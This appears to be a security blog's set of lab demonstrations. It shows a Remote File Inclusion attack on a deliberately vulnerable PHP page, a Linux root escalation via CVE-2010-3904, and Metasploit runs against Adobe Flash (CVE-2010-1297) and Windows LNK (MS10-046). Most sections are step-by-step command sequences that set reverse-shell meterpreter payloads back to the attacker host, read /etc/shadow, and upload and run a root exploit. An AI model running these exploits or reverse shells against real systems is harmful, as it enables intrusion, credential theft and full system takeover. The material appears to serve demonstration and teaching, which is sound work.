Remote File Inclusion and privilege escalation through Metasploit

Metasploit, ,

Demonstration of a RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS Protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
<?php
$color='blue';
if(isset($_REQUEST['COLOR'])) {
$color = $_REQUEST['COLOR'];
}
require ($color . '.php');
?>

chown -R apache:apache 1

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit

getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow

lwpd
lcd /home/eromang/exploits/linux/local_escal­ations
upload linux-rds-exploit_CVE-2010-3904

execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow

Video demonstration

CVE-2010-3904: Linux RDS Protocol Local Privilege Escalation

Exploits,

Timeline :

Vulnerability discovered by Dan Rosenberg
Vulnerability disclosed to the vendor the 2010-10-13
Coordinated vulnerability disclosure the 2010-10-19

PoC provided by :

Dan Rosenberg

Reference(s) :

CVE-2010-3904

Affected version(s) :

Kernel Linux 2.6.30 to 2.6.36-rc8

Tested on Ubuntu 10.04

Description :

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write abritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.

Demonstration :

CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use

Exploits, Metasploit,

Timeline :

Vulnerability & PoC disclosed by unknown on Exploit-DB the 2010-06-09
Metasploit PoC provided the 2010-06-10

PoC provided by :

unknown
jduck

Reference(s) :

CVE-2010-1297
APSA10-01

Affected version(s) :

Adobe Flash Player 10.0.45.2, 9.0.262, and previous versions for 10.0.x and 9.0.x for Windows, Macintosh, Linux and Solaris.
Adobe Reader and Acrobat 9.3.2, and previous versions 9.x for Windows, Macintosh and UNIX.

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.

Commands :

use exploit/windows/browser/adobe_flashplayer_newfun­ction
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-046 : Microsoft Windows Shell LNK Execution

Exploits, Metasploit, ,

Timeline :

Vulnerability discovered exploited in the wild, part of the Stuxnet worm
Metasploit PoC provided the 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 et Windows Vista SP2
Windows Vista x64 Edition SP1 et Windows Vista x64 Edition SP2
Windows Server 2008 32 et Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig